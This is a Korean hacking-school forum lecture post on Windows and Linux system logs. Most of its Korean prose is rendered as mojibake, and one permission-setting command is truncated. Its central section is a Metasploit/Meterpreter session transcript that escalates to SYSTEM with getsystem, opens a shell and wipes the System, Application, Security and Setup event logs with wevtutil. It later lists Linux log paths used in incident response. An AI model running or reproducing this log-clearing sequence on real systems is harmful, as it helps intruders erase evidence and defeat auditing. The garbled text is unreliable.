http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=8576 [º¹»ç]
(À̹ÌÁö´Â /var/log/boot ·Î±×ÀÇ ¿¹½Ã)
À©µµ¿ì : eventlog
¹ÙÀ̳ʸ® ÆÄÀÏ·Î ÀÛ¼ºµÈ´Ù.
- ¸ÞŸ½ºÇ÷ÎÀÕÀ¸·Î À©µµ¿ì ¼¹ö ·Î±× ±â·Ï Áö¿ì±â -
[*] Sending stage (1189423 bytes) to 192.168.0.1
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:49164) at 2017-11-10 21:29:00 +0900
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows WIN2008\Administrator @ WIN2008
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
meterpreter > getuid
Server username: WIN2008\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 636 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>wevtutil.exe el
wevtutil.exe el
Analytic
Application
....Áß·«.....
Microsoft-Windows-osk/Diagnostic
Microsoft-Windows-stobject/Diagnostic
Security
Setup
System
TabletPC_InputPanel_Channel
ThinPrint Diagnostics
WINDOWS_MP4SDECD_CHANNEL
WMPSetup
WMPSyncEngine
Windows PowerShell
microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin
C:\Windows\system32>wevtutil.exe cl "System"
wevtutil.exe cl "System"
C:\Windows\system32>wevtutil.exe cl "Application"
wevtutil.exe cl "Application"
C:\Windows\system32>wevtutil.exe cl "Security"
wevtutil.exe cl "Security"
C:\Windows\system32>wevtutil.exe cl "Setup"
wevtutil.exe cl "Setup"
- À̺¥Æ® ·Î±×¸¦ Áö¿ì´Â ¹æ¹ý -
1. À̺¥Æ® ºä¸¦ ½ÃÀÛÇÑ´Ù.
2. ÄÜ¼Ö Æ®¸®¿¡¼ Áö¿ì·Á´Â À̺¥Æ® ·Î±×·Î À̵¿ÇÑ´Ù.
3. ÀÛ¾÷ ¸Þ´º¿¡¼ "·Î±× Áö¿ì±â"¸¦ Ŭ¸¯ÇÑ´Ù.
4. À̺¥Æ® ·Î±×¸¦ Áö¿ì°Å³ª º¹»çÇÑ ÈÄ Áö¿ï ¼ö ÀÖ´Ù.
5. ¸í·É ÁÙÀ» »ç¿ëÇÏ¿© À̺¥Æ® ·Î±×¸¦ Áö¿ì´Â ¹æ¹ýÀº ´ÙÀ½°ú °°´Ù.
¸í·É ÇÁ·ÒÇÁÆ®¸¦ ¿°í ´ÙÀ½ ¸í·ÉÀ» ÀÔ·ÂÇÑ´Ù.
wevtutil cl <·Î±× À̸§> [/bu:<¹é¾÷ ÆÄÀÏ À̸§>]
Ãß°¡ÀûÀ¸·Î °í·ÁÇØ¾ß ÇÒ »çÇ×Àº
ÀÌ ÀÛ¾÷À» ¼öÇàÇϱâ À§ÇØ ·Î±×¿¡ "Áö¿ì±â" ±ÇÇÑÀÌ ÀÖ¾î¾ß ÇÑ´Ù.
ÀϹÝÀûÀ¸·Î °ü¸®ÀÚ¿¡°Ô´Â ÀÌ ±ÇÇÑÀÌ ºÎ¿©µÈ´Ù.
´Ù¸¥ ±×·ì¿¡°Ô ·Î±×¿¡ ´ëÇÑ "Áö¿ì±â" ±ÇÇÑÀ» ¼³Á¤ÇÏ·Á¸é
´ÙÀ½°ú °°ÀÌ ¸í·ÉÀ» ÀÔ·ÂÇÏ¸é µÈ´Ù.
wevtutil sl <·Î±× À̸§> /ca:<º¸¾È ±â¼úÀÚ>
·Î±×¿¡ ´ëÇÑ SDDL(º¸¾È ±â¼úÀÚ Á¤ÀÇ ¾ð¾î) ¹®ÀÚ¿À» º¸·Á¸é ´ÙÀ½ ¸í·ÉÀ» »ç¿ëÇÑ´Ù.
wevtutil gl <·Î±× À̸§>
¿¹¸¦ µé¾î, "¹é¾÷ ¿¬»êÀÚ" ±×·ì¿¡ ´ëÇÑ "ÀÀ¿ë ÇÁ·Î±×·¥"
·Î±×ÀÇ "Áö¿ì±â" ±ÇÇÑÀ» Ãß°¡ÇÏ´Â ¹æ¹ýÀº ´ÙÀ½°ú °°´Ù.
wevtutil sl ÀÀ¿ë ÇÁ·Î±×·¥ /ca:O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;B
·Î±× È®ÀÎ(À©µµ¿ì 2008±âÁØ)
½ÃÀÛ > Á¦¾îÆÇ > °ü¸®µµ±¸ > À̺¥Æ® ºä > Windows ·Î±×
¸®´ª½º : syslog (/var/log)
ÅؽºÆ®¸¦ ±â¹ÝÀ¸·Î ÀÛ¼ºµÈ´Ù.
ÇÏÁö¸¸ ¹ÙÀ̳ʸ®·Î ÀúÀåµÇ´Â °Íµµ ÀϺÎÀÖ´Ù.
#cat /var/log/messages
»ç¶÷ÀÌ Àϱâ ÆíÇÑ ÇüÅÂÀÇ ÅؽºÆ® ÆÄÀÏÀÌ´Ù.
½Ã½ºÅÛ º¯°æ »çÇ×µéÀÌ ÀúÀåµÇ¾î ÀÖ´Ù.
ħÇØ»ç°í´ëÀÀ¿¡¼´Â ÀÌ ºÎºÐ¿¡¼ À¯ÀǹÌÇÑ ·Î±×¸¦ ¹ß°ßÇϱ⠾î·Æ´Ù.
½Ã½ºÅÛ °ü¸®ÀÚÀÇ ·Î±×°¡ ¸¹Áö¸¸ ħÇØ»ç°í¿¡´Â º°·Î ¾ø´Ù.
ÇÏÁö¸¸ ²À È®ÀÎÀ» ÇؾßÇÑ´Ù.
#cat /var/log/auth.log
ÀÎÁõ ·Î±×, /var/log/secureµµ Á¸ÀçÇÑ´Ù.
¿ø°Ý ¶Ç´Â ·ÎÄà Á¢¼ÓµîÀÇ ·Î±× Á¤º¸°¡ Á¸ÀçÇÑ´Ù.
#cat /var/log/wtmp
»ç¿ëÀÚÀÇ ·Î±×ÀÎ/·Î±×¾Æ¿ô, ½Ã½ºÅÛ ºÎÆÃ/¼Ë´Ù¿î È÷½ºÅ丮 Á¤º¸
#cat /var/run/utmp
|
Hit : 644 Date : 2024/05/20 10:42
|